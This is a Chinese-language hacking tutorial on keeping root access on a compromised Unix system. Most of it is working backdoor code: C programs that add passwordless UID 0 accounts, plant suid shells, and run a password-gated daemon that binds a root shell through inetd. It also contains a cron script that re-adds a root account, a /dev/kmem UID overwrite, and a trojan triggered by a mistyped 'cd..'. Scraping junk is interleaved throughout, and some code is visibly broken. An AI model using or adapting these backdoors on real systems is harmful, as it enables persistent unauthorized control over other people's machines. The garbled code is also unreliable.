“后門(mén)”技巧

本文的意旨是讓你學(xué)會(huì)如何在完全控制系統(tǒng)后保留自己的根用戶(hù)權(quán)限。這是黑客們非常熱衷討論的話題，但同時(shí)也應(yīng)該是系統(tǒng)管理員們必須非常留意的。本文不可能列出所有的后門(mén)技巧，因?yàn)檫@些方法實(shí)在是太多了。但我會(huì)在文章中盡量解釋那些通用的方法和技術(shù)。
6 _: L" q& c7 X, W# @3 a3 s3 d4 F
, u4 @% ]7 }) R. L& C6 Q* N6 s如果你作為（或者曾經(jīng)作為）一名攻擊者，花費(fèi)了數(shù)周時(shí)間，才將一個(gè)帳號(hào)弄到手，但它的權(quán)限卻實(shí)在可憐。這個(gè)系統(tǒng)據(jù)說(shuō)非常安全，而你卻希望能夠更清楚地知道系統(tǒng)管理員究竟高明到什么程度。:) 于是你用盡了各種方法：IMAP、NIS、suid程序、錯(cuò)誤的訪問(wèn)權(quán)限、進(jìn)程競(jìng)爭(zhēng)，等等，但仍然“不得其門(mén)而入”。最后，在一次偶然的情況下，你發(fā)現(xiàn)了系統(tǒng)管理員的一個(gè)小小失誤，從而很快就獲得了根用戶(hù)權(quán)限。下一步要干什么呢？如何才能使你保留這個(gè)花費(fèi)了如此長(zhǎng)時(shí)間才完成的“藝術(shù)品”呢？
" p/ I! i0 i3 c) j" ~
* g6 E$ w1 c' _2 C
[初級(jí)]

' U: P+ W+ E5 Z8 {& ~2 f最簡(jiǎn)單的方法，就是在口令文件 passwd 中增加一個(gè) UID 為 0 的帳號(hào)。但最好別這么做，因?yàn)橹灰到y(tǒng)管理員檢查口令文件就會(huì)“漏餡”了。以下是在 /etc/passwd 口令文件中添加一個(gè) UID 0 帳號(hào)的C程序。

<++> backdoor/backdoor1.c
% C# w; P" x* ?) U; [# Z. K! U8 n% D#include
" Q1 Q* Y. A4 d, z; T9 w. h5 F
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->

( c/ K/ \5 {. o! N3 _- ]. \1 r比這種方法稍微隱蔽一點(diǎn)的就是將藏在口令文件中某個(gè)無(wú)人使用帳號(hào)的 UID 改為 0，并將其第二個(gè)域（口令域）設(shè)為空。（注意，如果你使用的是較高版本的*nix，也許還要修改 /etc/shadow 文件。）

在 /tmp 目錄下放置 suid shell。以后只要你運(yùn)行這個(gè)程序，就會(huì)輕易得到根用戶(hù)權(quán)限。這種方法幾乎是最受歡迎的了。但有許多系統(tǒng)每幾小時(shí)，或者每次啟動(dòng)都會(huì)清除 /tmp 目錄下的數(shù)據(jù)，另外一些系統(tǒng)則根本不允許運(yùn)行 /tmp 目錄下的 suid 程序。當(dāng)然，你可以自己修改或清除這些限制（因?yàn)槟阋咽歉脩?hù)，有權(quán)限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件）。以下是在 /tmp 目錄下放置 suid shell 程序的C源程序。

<++> backdoor/backdoor2.c
#include
main()
{
3 x; q; H) D9 _7 Fsystem("cp /bin/sh /tmp/fid");
: C& M  h2 h4 a- r2 T# @3 T" nsystem("chown root.root /tmp/fid");
6 g: N, g6 E. f( F4 r2 Tsystem("chmod 4755 /tmp/fid");
}
) M( o! i# N0 `2 _9 q: E$ \<-->


[中級(jí)]
* M/ M$ F, [+ q9 i) _
超級(jí)服務(wù)器守護(hù)進(jìn)程（inetd）的配置文件。系統(tǒng)管理員一般情況下不經(jīng)常檢查該文件，因此這倒是個(gè)放置“后門(mén)”的好地方。:) 那么在這里如何建立一個(gè)最好的后門(mén)呢？當(dāng)然是遠(yuǎn)程的了。這樣你就不必需要本地帳號(hào)就可以成為根用戶(hù)了。首先，讓我們先來(lái)了解一下這方面的基礎(chǔ)知識(shí)：inetd 進(jìn)程負(fù)責(zé)監(jiān)聽(tīng)各個(gè)TCP和UDP端口的連接請(qǐng)求，并根據(jù)連接請(qǐng)求啟動(dòng)相應(yīng)的服務(wù)器進(jìn)程。該配置文件 /etc/inetd.conf 很簡(jiǎn)單，基本形式如下：
. L$ F3 j# ]; I; X. y
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
: r  I7 J1 v# h9 K: xmountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd
  \7 f9 N6 x6 ^
9 n/ N9 s$ G6 s6 J7 @1：第一欄是服務(wù)名稱(chēng)。服務(wù)名通過(guò)查詢(xún) /etc/services 文件（供 TCP 和 UDP 服務(wù)使用）或 portmap 守護(hù)進(jìn)程（供 RPC 服務(wù)使用）映射成端口號(hào)。RPC（遠(yuǎn)程過(guò)程調(diào)用）服務(wù)由 name/num 的名字格式和第三欄中的 rpc 標(biāo)志識(shí)別。
2：第二欄決定服務(wù)使用的套接口類(lèi)型：stream、dgram 或 raw。一般說(shuō)來(lái)，stream 用于 TCP 服務(wù)，dgram 用于 UDP， raw 的使用很少見(jiàn)。
3：第三欄標(biāo)識(shí)服務(wù)使用的通信協(xié)議。允許的類(lèi)型列在 protocols 文件中。協(xié)議幾乎總是是 tcp 或 udp。RPC 服務(wù)在協(xié)議類(lèi)型前冠以 rpc/。
8 V! \! Z. f9 i, o4：如果所說(shuō)明的服務(wù)一次可處理多個(gè)請(qǐng)求（而不是處理一個(gè)請(qǐng)求后就退出），那么第四欄應(yīng)置成 wait，這樣可以阻止 inetd 持續(xù)地派生該守護(hù)進(jìn)程的新拷貝。此選項(xiàng)用于處理大量的小請(qǐng)求的服務(wù)。如果 wait 不合適，那么在本欄中填 nowait。
0 W9 O+ ?" `3 B# |5：第五欄給出運(yùn)行守護(hù)進(jìn)程的用戶(hù)名。
" G/ ~! M7 B$ R6：第六欄給出守護(hù)進(jìn)程的全限定路徑名。
7：守護(hù)進(jìn)程的真實(shí)名字及其參數(shù)。
' E" ?" `) N7 p9 n1 j
, y, P+ L3 ?0 O如果所要處理的工作微不足道（如不需要用戶(hù)交互），inetd 守護(hù)進(jìn)程便自己處理。此時(shí)第六、七欄只需填上 'internal' 即可。所以，要安裝一個(gè)便利的后門(mén)，可以選擇一個(gè)不常被使用的服務(wù)，用可以產(chǎn)生某種后門(mén)的守護(hù)進(jìn)程代替原先的守護(hù)進(jìn)程。例如，讓其添加 UID 0 的帳號(hào)，或復(fù)制一個(gè) suid shell。

一個(gè)比較好的方法之一，就是將用于提供日期時(shí)間的服務(wù) daytime 替換為能夠產(chǎn)生一個(gè) suid root 的 shell。只要將 /etc/inetd.conf 文件中的：
" X( s& c5 `( ]: F3 D9 x
4 f; d- E! R5 C6 Gdaytime stream tcp nowait root internal
; J+ {' T% r8 @! ~" A
修改為：

, _. r; y/ R( s. C4 y1 qdaytime stream tcp nowait /bin/sh sh -i.
7 z8 r0 [. p% a' P, d
  P2 [# T, ^* {' x然后重啟（記?。阂欢ㄒ貑ⅲ﹊netd 進(jìn)程：

% n! K% h4 N- O9 [0 ^, D; ~( ~killall -9 inetd。
7 R) Q6 [2 M, n: K
但更好、更隱蔽的方法是偽造網(wǎng)絡(luò)服務(wù)，讓它能夠在更難以察覺(jué)的情況下為我們提供后門(mén)，例如口令保護(hù)等。如果能夠在不通過(guò) telnetd 連接的情況下輕松地進(jìn)行遠(yuǎn)程訪問(wèn)，那是再好不過(guò)了。方法就是將“自己的”守護(hù)程序綁定到某個(gè)端口，該程序?qū)ν鈦?lái)連接不提供任何提示符，但只要直接輸入了正確的口令，就能夠順利地進(jìn)入系統(tǒng)。以下是這種后門(mén)的一個(gè)示范程序。（注：這個(gè)程序?qū)懙貌⒉缓芡暾?。?br /> / B; F" [0 S" m8 T' C
' L- t8 B/ o* b% q+ h5 p<++> backdoor/remoteback.c
$ G+ a, G0 q( I! p/* Coders:
# t/ t8 H; a' G4 U6 i- C3 \& o6 uTheft

Help from:
Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen,
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
% v2 \/ o9 ~8 M: M! C% u, ^Tg0d, EHAP.
Usage:
4 a! `: w+ r; P& Z8 QSetup:
# gcc -o backhore backhore.c # ./backdoor password &
Run:
9 d. `( K8 C9 ]Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
% _! w7 X$ U8 YYou will be prompted for a command, pick 1-8.
) Z5 Y5 {% d; ]" Y4 t% U2 p
Distributers:
- K, Q, O- \) g/ G0 y% W6 U6 SEthical Mutiny Crew

- q+ R6 B7 ^5 v( B) c*/
  L/ \9 D% s- v0 s. F
#include
+ @( x# U2 _- M5 v3 {. X  r#include
#include
#include
#include
9 u8 E2 K3 E! }) i#include
( r, G1 B; |+ Y& P* v#include
#include


#define PORT 4000
/ f( ~( X2 B% S  V#define MAXDATASIZE 100
  f, ]; m) j. t. \#define BACKLOG 10
4 c7 W5 q- x! g8 o#define SA struct sockaddr

( ?! R: ^* f- c- Hvoid handle(int);
$ A7 u" O" x, u
2 `3 K" M& g$ V6 G/ O* c% R  tint
main(int argc, char *argv[])
; x& N1 \6 l' z2 i{
8 w# W. n9 B, f$ i& g7 B% nint sockfd, new_fd, sin_size, numbytes, cmd;
. B  X! s# o. x" Fchar ask[10]="Command: ";
char *bytes, *buf, pass[40];
& b: t4 O& W( Q- r  W$ M* t! Y* {& {struct sockaddr_in my_addr;

struct sockaddr_in their_addr;

6 _1 d- H" W- L" v$ p4 I- a1 Eprintf("\n Backhore BETA by Theft\n");
printf(" 1: trojans rc.local\n");
' C' U, V' K- s& ~( zprintf(" 2: sends a systemwide message\n");
printf(" 3: binds a root shell on port 2000\n");
printf(" 4: creates suid sh in /tmp\n");
printf(" 5: creates mutiny account uid 0 no passwd\n");
printf(" 6: drops to suid shell\n");
, F4 k( w7 U! Sprintf(" 7: information on backhore\n");
5 ~% r4 `5 M$ b; dprintf(" 8: contact\n");

$ o, E6 ~$ d1 s) m4 n/ [1 jif (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
4 v$ V9 Z1 K; W9 y, j+ ?. w5 Eexit(1);
0 n0 c4 d2 g- K; B  A( k0 ]& a}

strncpy(pass, argv[1], 40);
9 s, h8 h( [4 D6 o. Wprintf("..using password: %s..\n", pass);
5 `& a, z% I! D4 m. b$ ]
6 P3 L  e, i& g$ x5 a& G
' S, n" a" q& |' N0 B2 E. Oif ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
6 u9 ]5 m4 |4 }0 t) J' lperror("socket");
3 q7 m% `) W' [) ^exit(1);
}
6 Q2 t1 Z& m- c6 ]( s! y2 V3 g
1 n# ^6 p+ Q  N3 I! j+ Omy_addr.sin_family = AF_INET;
$ J9 n4 u/ V: b- N. V. F$ W& I8 U( Wmy_addr.sin_port = htons(PORT);
) p3 V: n; O5 Pmy_addr.sin_addr.s_addr = INADDR_ANY;
" k" v, A9 N: N& r' c6 o
5 I4 s  P$ Q/ K) gif (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
6 q  h, m4 b$ X7 D
perror("bind");
exit(1);
! ]$ L2 A) W& k, _! F}

if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
: S9 Z9 l6 g( a7 L: F: H1 y2 Bexit(1);
}

) U% @3 i! e0 Q6 M# K  P1 csin_size = sizeof(SA);
& |( ]" @, R% s  M! Rwhile(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
: _/ \) _) D+ \7 W( Qif (!fork()) {
dup2(new_fd, 0);
) b% l  Q, }8 S: k! a( {2 U5 zdup2(new_fd, 1);
$ \9 \* D; ~# N8 [$ p' y8 |$ Pdup2(new_fd, 2);
/ g" a; h+ W* j% \4 \, rfgets(buf, 40, stdin);
9 v: U6 [. W" X; Z2 t* z: mif (!strcmp(buf, pass)) {
4 z2 x( B6 T2 E/ d3 I. ]( }; S8 S7 m; lprintf("%s", ask);
cmd = getchar();
! K( n. u: T# d' bhandle(cmd);
}
close(new_fd);
exit(0);
: l6 s: {4 |0 Y7 R}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
}
3 _* A& z; ?& y" Y2 E

6 Z% e, |3 \" j7 ^7 s
void
0 `: U! q% x. xhandle(int cmd)
0 `* }0 o4 \5 |3 P{
# S) `: W) {- h) N1 J4 vFILE *fd;

switch(cmd) {
case '1':
printf("\nBackhore BETA by Theft\n");
, C! j) P+ ?/ ~! rprintf("theft@cyberspace.org\n");
! ^, o. h6 _7 j5 H: [printf("Trojaning rc.local\n");
0 n8 m! X6 L5 n, h2 ~) |. Lfd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
0 Z2 ~: ~1 r* h! n2 E" b, S/ [, @fclose(fd);
printf("Trojan complete.\n");
- S0 h- _7 q8 ~+ K0 o# ?' Obreak;
  F+ |4 F% L# W& F5 Gcase '2':
printf("\nBackhore BETA by Theft\n");
' A! L5 _% |/ l0 zprintf("theft@cyberspace.org\n");
; L9 Z% v' y" o. }printf("Sending systemwide message..\n");
6 Y/ \( ~0 X3 J0 y2 e" _$ Zsystem("wall Box owned via the Ethical Mutiny Crew");
3 N, V. Q7 ~2 Uprintf("Message sent.\n");
$ Z$ d& ^! B. f5 U8 U' bbreak;
case '3':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
3 ?9 s; E6 G5 F6 eprintf("\nAdding inetd backdoor... (-p)\n");
fd = fopen("/etc/services","a+");
& T5 K% }3 V6 a2 V5 Hfprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
8 A! J  W7 Y" o. [" X- w8 R/ dfd = fopen("/etc/inetd.conf","a+");
3 G( ~0 n, t) g6 u' @; b! e; Rfprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
4 v' e/ c0 ]2 ^5 C/ B' g4 s! k/ wexecl("killall", "-HUP", "inetd", NULL);
0 I* {# C; A4 g' Q1 N" y3 Vprintf("\ndone.\n");
printf("telnet to port 2000\n\n");
break;
case '4':
. O; }/ {8 y* I' I; D+ E! z6 Fprintf("\nBackhore BETA by Theft\n");
0 R+ M2 n2 K1 i1 l; A2 N. Dprintf("theft@cyberspace.org\n");
. o* b  H  @1 m3 N1 O  K; a& F) Eprintf("\nAdding Suid Shell... (-s)\n");
system("cp /bin/sh /tmp/.sh");
% U' ]& ]8 c) o$ t6 ]& L. fsystem("chmod 4700 /tmp/.sh");
( c: S% H, I. f# I; u/ [system("chown root:root /tmp/.sh");
$ Z. I+ ?, T. P- t4 {+ ^/ u& Lprintf("\nSuid shell added.\n");
  k" ^' l- _  V* |" tprintf("execute /tmp/.sh\n\n");
break;
  h) s  Y: @! \- l2 k+ Acase '5':
printf("\nBackhore BETA by Theft\n");
0 l+ w6 u% A+ h/ Qprintf("theft@cyberspace.org\n");
2 q- m  C  p7 z/ uprintf("\nAdding root account... (-u)\n");
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
; P1 u9 {9 c" W; S! w! f( m9 I8 q$ yprintf("\ndone.\n");
printf("uid 0 and gid 0 account added\n\n");
" R& l7 j$ {; g( U% dbreak;
$ ?' h' h8 q+ Z. g" a: F* v+ @case '6':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Executing suid shell..\n");

7 F1 R* E/ ]# bexecl("/bin/sh");
- e$ m" ?$ d3 u  c3 t! _8 Hbreak;
* _" `0 d- S* f1 |case '7':
2 S, X% I/ h% \# v. Gprintf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nInfo... (-i)\n");
& z. X1 p, z& l6 @3 a: {6 Oprintf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
printf("a root shell on port 2000. example: telnet 2000\n\n");
7 w0 S& E; o5 v0 F6 r/ [6 k% jprintf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
printf("executed gives you a root shell. example:/tmp/.sh\n\n");
) N: b" E, z- ]$ j/ t: E1 f) rprintf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
printf("The login is 'mutiny' and there is no passwd.");
5 I6 B7 r$ [- i' [. Nbreak;
case '8':
printf("\nBackhore BETA by Theft\n");
, h5 t, K& Q: Y& f/ y; h! b+ gprintf("\nhttp://theft.bored.org\n");
printf("theft@cyberspace.org\n\n");
break;
default:
) I' e  Q* z7 U% v. a; Z- }printf("unknown command: %d\n", cmd);
break;
}
0 V- j) K1 y6 Q, W}
/ W1 O( Y6 T/ \7 L. |5 s3 o. x<-->

5 ]8 n/ O7 k: X; R5 x$ t+ v5 W
[高級(jí)]
7 Q, N: q2 j2 g: v# O" \
Crontab 程序?qū)τ谙到y(tǒng)管理員來(lái)說(shuō)是非常有用的。Cron 服務(wù)用于計(jì)劃程序在特定時(shí)間（月、日、周、時(shí)、分）運(yùn)行。如果你足夠聰明，就應(yīng)該加以利用，使之為我們制造“后門(mén)”！通過(guò) Cron 服務(wù)，你可以讓它在每天凌晨 3:00 （這個(gè)時(shí)候網(wǎng)管應(yīng)該睡覺(jué)了吧。）運(yùn)行后門(mén)程序，使你能夠輕易進(jìn)入系統(tǒng)干你想干的事，并在網(wǎng)管起來(lái)之前退出系統(tǒng)。根用戶(hù)的 crontab 文件放在 /var/spool/crontab/root 中，其格式如下：

(1) (2) (3) (4) (5) (6)
3 V; f+ ~. V( P" L' {3 @0 0 * * 3 /usr/bin/updatedb

8 |/ Y4 Z, f# n1. 分鐘 (0-60)
; I5 D! b. x- }$ W9 t8 ^) r2 K2. 小時(shí) (0-23)
( z% z" b7 o8 ]- q" U3. 日 (1-31)
4. 月 (1-12)
4 K7 D9 X6 Q* G: v5. 星期 (1-7)
6. 所要運(yùn)行的程序

以上內(nèi)容設(shè)置該程序于每星期三 0:0 運(yùn)行。要在 cron 建立后門(mén)，只需在 /var/spool/crontab/root 中添加后門(mén)程序即可。例如該程序可以在每天檢查我們?cè)?/etc/passwd 文件中增加了用戶(hù)帳號(hào)是否仍然有效。以下是程序示例：

0 0 * * * /usr/bin/retract
3 b( [# Q( F1 R7 n6 r5 R
<++> backdoor/backdoor.sh
* B/ P# w3 J( m$ P#!/bin/csh

0 i: W' h# D0 E/ h9 D: l5 n1 R. Pset evilflag = (`grep eviluser /etc/passwd`)

$ [+ ~  M! o/ i: q
if($#evilflag == 0) then

set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
( t& |: r- {( H  C* e( o@ linecount[1] /= 2
9 H3 b' V. m" D, R" s@ linecount[1] += 1
; E8 |, ?4 [/ T' j; F$ lsplit -$linecount[1] ./temppass
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
. e" m+ q- `, T4 T, J5 Recho Done...
else
endif
<-->

  j, ]! L5 i5 i( I" A0 A* b
& g' s$ G1 ]) D! Q! ~" A5 Q[綜合]
& H: q; j3 t) P' C8 l8 w5 G) [/ M0 X
當(dāng)然，我們可以編寫(xiě)木馬程序，并把它放到 /bin 目錄下。當(dāng)以特定命令行參數(shù)運(yùn)行時(shí)將產(chǎn)生一個(gè) suid shell。以下是程序示例：

, |$ C8 M1 p: V3 G, f6 Y" D<++> backdoor/backdoor3.c
) L+ @) e4 f9 s  h4 i# n) x3 P' _3 M#include
#define pass "triad"
- f9 N( Z+ d3 [% y2 B#define BUFFERSIZE 6

int main(argc, argv)
% e, h) v. c- ]* m, t' jint argc;
* L4 {* W: k+ l  W7 p' E7 Ychar *argv[];{

: }0 M2 c& R1 w5 |5 v  ]2 [int i=0;
! l$ ^/ ~0 ?+ @4 t/ b% `
* l4 ]4 z( j: Y  d! I! Zif(argv[1]){

if(!(strcmp(pass,argv[1]))){
4 W  q5 C+ n6 f

/ a* f3 _0 X3 b) ?system("cp /bin/csh /bin/.swp121");
& l8 W; t7 ?% l+ _system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
" O& l8 @- t. D0 _, }8 a( R}
* p! Y! H. c9 K8 G}

# B& S. T' H6 k+ z2 M. ]printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i<10;i++){
7 M) S* C! d! N! }$ m* |% o0 S: H  ~  z& kfprintf(stderr,".");
! ]9 K, S4 G; t3 rsleep(1);
, f% s  L* W$ R- }}
/ K( Q. V. {/ X5 A7 C. wprintf("\nAction aborted after 10 attempts.\n");
return(0);
}
. j: s+ ?9 y, C+ ~: d<-->
/ h. l" O9 J+ _6 E
* W/ Y; E3 j  b. N$ F3 H. s
[變種]
4 |1 X4 U- w3 M
/ }/ O/ {( }1 t1 N: f/ L以下程序通過(guò)在內(nèi)存中尋找你所運(yùn)行程序的 UID，并將其改為 0，這樣你就有了一個(gè) suid root shell 了。

7 D6 [8 ^8 I5 C  F6 B* m<++> backdoor/kmemthief.c
#include
#include
- S; ~  p: `5 I! z; l( X#include
# P  J5 a& }" G& I0 G6 F#include
#include
' Q( [# R5 _3 [: e8 k7 F# P4 C#include
#include

+ @* z4 G  K* ~#define pass "triad"

struct user userpage;
; U) n! I$ X) b9 g0 y" zlong address(), userlocation;
/ Z4 t7 w; \8 j
( z* W  j. z  Cint main(argc, argv, envp)
int argc;
9 d- @/ ~3 E0 |char *argv[], *envp[];{
, f+ O# d+ Q6 o/ L1 L; ?) c: F
* P0 W& s2 t# b. c3 h! C) fint count, fd;
long where, lseek();
& S3 g. k3 ^4 c5 x7 B4 A1 Y* B6 M
if(argv[1]){
4 b9 M  w: v- [7 {if(!(strcmp(pass,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);

* l" ~$ |' v& }+ h1 i- \if(fd<0){
  z' R5 p# w% c$ ]printf("Cannot read or write to
/ P! ~; g- X, s/dev/kmem\n");
perror(argv);
exit(10);
}

userlocation=address();
( @/ ^1 Y5 b. _$ y  k5 {' }: Dwhere=(lseek(fd,userlocation,0);
, ]3 M3 C+ g& t  W$ g4 D  B- r
5 o; x& w* w0 Q1 `8 t" iif(where!=userlocation){
+ P# l2 M) [$ D+ Eprintf("Cannot seek to user page\n");
perror(argv);
exit(20);
}

# f7 w  E, R" U2 lcount=read(fd,&userpage,sizeof(struct user));

2 q3 S- f: t5 y7 @! \if(count!=sizeof(struct user)){
  N1 q- U$ o7 w: Sprintf("Cannot read user page\n");
perror(argv);
" n4 K4 B; k. A# dexit(30);
}
. T6 u3 M* N' A+ ]2 M0 |/ @
printf("Current UID: %d\n",userpage.u_ruid);
$ n9 a1 N. o. Q: H3 Rprintf("Current GID: %d\n",userpage.g_ruid);

userpage.u_ruid=0;
, K% j4 b9 a1 J, ?- c- X$ p+ S% K% yuserpage.u_rgid=0;
5 W& L  h' e, Y
3 Y. S7 q& x; f0 m0 Hwhere=lseek(fd,userlocation,0);
: \4 j4 i+ T& O* p
if(where!=userlocation){
: p5 b2 j' |5 Z1 ^. [printf("Cannot seek to user page\n");
! _, s3 Q5 U# jperror(argv);
exit(40);
}
: S! D5 E! B; p' F1 A) F/ E
: ~) y/ N( J6 L7 h( K# k" Zwrite(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));

5 [! U; r+ ^8 q2 R4 ~/ Q! @" jexecle("/bin/csh","/bin/csh","-i",(char *)0, envp);
9 n$ X) R; z) T/ M}
}

}
. Q( U" N  r  t8 T; A- c0 r<-->

4 }9 `+ {9 T5 [. V- A# T9 Y) I3 X
[“笨”方法]
8 x. y- t$ P% C1 z* V$ X; r
你有沒(méi)有曾經(jīng)試過(guò)在 UNIX 系統(tǒng)下錯(cuò)把 "cd .." 輸入為 "cd.."？這是由于使用 MS Windows 和 MS-DOS 養(yǎng)成的習(xí)慣。這種錯(cuò)誤網(wǎng)管是否也會(huì)犯呢？如果是這樣的話，可不可以讓他為我們做點(diǎn)“貢獻(xiàn)”呢？:) 例如當(dāng)他輸入 "cd.." 時(shí)，會(huì)激活我們的木馬程序。這樣我們就不必登錄到系統(tǒng)去激活木馬了。以下是程序示例：

' ~6 C8 i6 `, C! E) N$ ~<++> backdoor/dumb.c
/*
/ R; r) L2 j7 b' D) y' \  a本程序可在管理員偶然地輸入 cd.. 時(shí)向 /etc/passwd 文件添加一個(gè) UID 0 帳號(hào)。但同時(shí)它也實(shí)現(xiàn) cd .. 功能，從而騙過(guò)管理員。
' v4 o1 ]7 W* G3 t*/
+ F4 x6 n8 ]; s- [
0 i- P3 x* N4 R) l; n3 x- M& ~#include
#include
* C4 f, R/ Q) C# H2 X4 d# E
5 p: O, ~5 t0 ^% n! k+ amain()
9 B' G0 O3 _3 w6 W& k# O2 I{
FILE *fd;
  C1 k! `- @, mfd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
system("cd");
}
<-->

5 n$ d7 W- f, m3 p8 F把上面的程序編譯好，放到隱蔽的地方。最好使用 chown 命令將該程序的屬主改為 root，使管理員使用 "ls -alF" 命令看到 suid 程序時(shí)不至于懷疑。

* G% q7 q+ K, V- G' E+ t5 c; Z好了，將這個(gè)程序（假設(shè)其名為 fid）放好以后，下一步的工作就是建立該程序到 "cd.." 的鏈接：ln cd.. /bin/out。這樣，只要系統(tǒng)管理員犯了這個(gè)輸入錯(cuò)誤，你就可以又一次得到系統(tǒng)控制權(quán)了。
+ r2 o0 M" Q& q. N- |+ _% L% W

* j4 [- M) N! s$ `[結(jié)束語(yǔ)]
4 s. ^: M/ W: ~: ^+ }
+ k2 a8 s0 [) |) k0 Z, x本文主要是讓你了解一下如何建立、維持、使用后門(mén)。知道了這些，當(dāng)然也就知道如何清除它們了。你可以按自己的興趣利用這些資料，但請(qǐng)慎重考慮清楚，后果自負(fù)